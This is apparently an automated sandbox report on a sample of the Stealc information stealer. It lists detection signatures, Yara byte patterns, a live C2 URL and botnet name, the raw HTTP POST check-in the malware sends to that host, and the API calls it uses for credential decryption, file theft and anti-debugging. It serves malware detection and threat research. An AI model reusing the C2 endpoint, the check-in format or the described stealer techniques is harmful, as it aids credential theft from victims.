Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
4M3JIACIWk.exe

Overview

General Information

Sample name:4M3JIACIWk.exe
renamed because original name is a hash value
Original sample name:0bc1c014e9e5d1b09d1cf2ba0e521c79.exe
Analysis ID:1540239
MD5:0bc1c014e9e5d1b09d1cf2ba0e521c79
SHA1:3c8c872d90b308944d979b033b48870f1d2934db
SHA256:c7bbcad5b7a6cb9a404c4b6077cd657f6d24a98b5b7c4a399aef65a709e73f95
Tags:exeStealcuser-abuse_ch
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Machine Learning detection for sample
Searches for specific processes (likely to inject)
AV process strings found (often used to terminate AV products)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 4M3JIACIWk.exe (PID: 4996 cmdline: "C:\Users\user\Desktop\4M3JIACIWk.exe" MD5: 0BC1C014E9E5D1B09D1CF2BA0E521C79)
    • WerFault.exe (PID: 3816 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4996 -s 1044 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.201.252.118/ef952bc0f542da4b.php", "Botnet": "LogsDiller"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2280904911.000000000079E000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x10d8:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000000.00000002.2280928896.00000000007C8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
          • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
          Click to see the 3 entries
          SourceRuleDescriptionAuthorStrings
          0.2.4M3JIACIWk.exe.23e0e67.2.unpackJoeSecurity_StealcYara detected StealcJoe Security
            0.2.4M3JIACIWk.exe.400000.1.unpackJoeSecurity_StealcYara detected StealcJoe Security
              0.3.4M3JIACIWk.exe.2480000.0.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                0.2.4M3JIACIWk.exe.23e0e67.2.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                  0.2.4M3JIACIWk.exe.400000.1.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                    Click to see the 1 entries
                    No Sigma rule has matched
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-23T15:42:03.643810+020020442431Malware Command and Control Activity Detected192.168.2.549705185.201.252.11880TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: 00000000.00000003.2087612753.0000000002480000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://185.201.252.118/ef952bc0f542da4b.php", "Botnet": "LogsDiller"}
                    Source: 4M3JIACIWk.exeReversingLabs: Detection: 39%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: 4M3JIACIWk.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_0040C820 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA,0_2_0040C820
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_00407240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00407240
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_00409AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00409AC0
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_00418EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,0_2_00418EA0
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_00409B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_00409B60
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_023ECA87 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,0_2_023ECA87
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_023E74A7 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_023E74A7
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_023E9D27 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_023E9D27
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_023F9107 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_023F9107
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_023E9DC7 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_023E9DC7

                    Compliance

                    barindex
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeUnpacked PE file: 0.2.4M3JIACIWk.exe.400000.1.unpack
                    Source: 4M3JIACIWk.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E430
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_004138B0
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_00414570
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414910
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040ED20
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE70
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DE10
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004016D0
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DA80
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_00413EA0
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F6B0
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_023EE697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_023EE697
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_023F3B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_023F3B17
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_023F4B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_023F4B77
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_023EEF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_023EEF87
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_023F47D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_023F47D7
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_023EE077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_023EE077
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_023EF8F1 FindFirstFileA,0_2_023EF8F1
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_023EDCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_023EDCE7
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_023EC0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_023EC0D7
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_023E1937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_023E1937
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_023EF917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_023EF917
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_023F4107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_023F4107

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49705 -> 185.201.252.118:80
                    Source: Malware configuration extractorURLs: http://185.201.252.118/ef952bc0f542da4b.php
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.201.252.118Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /ef952bc0f542da4b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDAFHCGIJECFHIDGDBKEHost: 185.201.252.118Content-Length: 217Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 41 46 48 43 47 49 4a 45 43 46 48 49 44 47 44 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 41 35 42 41 33 31 42 42 44 44 38 31 32 36 33 38 30 30 30 39 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 46 48 43 47 49 4a 45 43 46 48 49 44 47 44 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4c 6f 67 73 44 69 6c 6c 65 72 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 46 48 43 47 49 4a 45 43 46 48 49 44 47 44 42 4b 45 2d 2d 0d 0a Data Ascii: ------JDAFHCGIJECFHIDGDBKEContent-Disposition: form-data; name="hwid"9A5BA31BBDD81263800096------JDAFHCGIJECFHIDGDBKEContent-Disposition: form-data; name="build"LogsDiller------JDAFHCGIJECFHIDGDBKE--
                    Source: Joe Sandbox ViewASN Name: INFRANET-ASIT INFRANET-ASIT
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.201.252.118
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.201.252.118
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.201.252.118
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.201.252.118
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.201.252.118
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.201.252.118
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.201.252.118
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.201.252.118
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_00404880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlenA,lstrlenA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00404880
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.201.252.118Connection: Keep-AliveCache-Control: no-cache
                    Source: unknownHTTP traffic detected: POST /ef952bc0f542da4b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDAFHCGIJECFHIDGDBKEHost: 185.201.252.118Content-Length: 217Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 41 46 48 43 47 49 4a 45 43 46 48 49 44 47 44 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 41 35 42 41 33 31 42 42 44 44 38 31 32 36 33 38 30 30 30 39 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 46 48 43 47 49 4a 45 43 46 48 49 44 47 44 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4c 6f 67 73 44 69 6c 6c 65 72 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 46 48 43 47 49 4a 45 43 46 48 49 44 47 44 42 4b 45 2d 2d 0d 0a Data Ascii: ------JDAFHCGIJECFHIDGDBKEContent-Disposition: form-data; name="hwid"9A5BA31BBDD81263800096------JDAFHCGIJECFHIDGDBKEContent-Disposition: form-data; name="build"LogsDiller------JDAFHCGIJECFHIDGDBKE--
                    Source: 4M3JIACIWk.exe, 00000000.00000002.2280928896.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, 4M3JIACIWk.exe, 00000000.00000002.2280849648.000000000078E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.201.252.118
                    Source: 4M3JIACIWk.exe, 00000000.00000002.2280928896.00000000007C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.201.252.118/
                    Source: 4M3JIACIWk.exe, 00000000.00000002.2280928896.0000000000801000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.201.252.118/4
                    Source: 4M3JIACIWk.exe, 00000000.00000002.2280928896.0000000000801000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.201.252.118/Y
                    Source: 4M3JIACIWk.exe, 00000000.00000002.2280928896.0000000000801000.00000004.00000020.00020000.00000000.sdmp, 4M3JIACIWk.exe, 00000000.00000002.2280928896.00000000007C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.201.252.118/ef952bc0f542da4b.php
                    Source: 4M3JIACIWk.exe, 00000000.00000002.2280928896.0000000000801000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.201.252.118/ef952bc0f542da4b.php&zV
                    Source: 4M3JIACIWk.exe, 00000000.00000002.2280928896.0000000000801000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.201.252.118/ef952bc0f542da4b.php/
                    Source: 4M3JIACIWk.exe, 00000000.00000002.2280928896.0000000000801000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.201.252.118/ef952bc0f542da4b.php3
                    Source: 4M3JIACIWk.exe, 00000000.00000002.2280928896.0000000000801000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.201.252.118/ef952bc0f542da4b.phpW
                    Source: 4M3JIACIWk.exe, 00000000.00000002.2280928896.00000000007C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.201.252.118/ef952bc0f542da4b.phpWindows
                    Source: 4M3JIACIWk.exe, 00000000.00000002.2280928896.0000000000801000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.201.252.118/ws
                    Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net

                    System Summary

                    barindex
                    Source: 00000000.00000002.2280904911.000000000079E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: String function: 004045C0 appears 317 times
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4996 -s 1044
                    Source: 4M3JIACIWk.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 00000000.00000002.2280904911.000000000079E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: 4M3JIACIWk.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: classification engineClassification label: mal100.troj.evad.winEXE@2/5@0/1
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00419600
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_00413720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00413720
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\67EQJOXR.htmJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4996
                    Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\5df78488-4c48-4551-a392-6f6e14ca05d9Jump to behavior
                    Source: 4M3JIACIWk.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: 4M3JIACIWk.exeReversingLabs: Detection: 39%
                    Source: unknownProcess created: C:\Users\user\Desktop\4M3JIACIWk.exe "C:\Users\user\Desktop\4M3JIACIWk.exe"
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4996 -s 1044
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeSection loaded: msimg32.dllJump to behavior
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeUnpacked PE file: 0.2.4M3JIACIWk.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeUnpacked PE file: 0.2.4M3JIACIWk.exe.400000.1.unpack
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_0041B035 push ecx; ret 0_2_0041B048
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_0079E005 pushad ; retn 0079h0_2_0079E315
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_0079E574 push eax; retf 0_2_0079E665
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_007A36F4 push eax; ret 0_2_007A3703
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_007A36E5 push eax; ret 0_2_007A3703
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_007A0714 push 7DD07DC0h; iretd 0_2_007A0725
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_023FB29C push ecx; ret 0_2_023FB2AF
                    Source: 4M3JIACIWk.exeStatic PE information: section name: .text entropy: 7.485371704883883
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
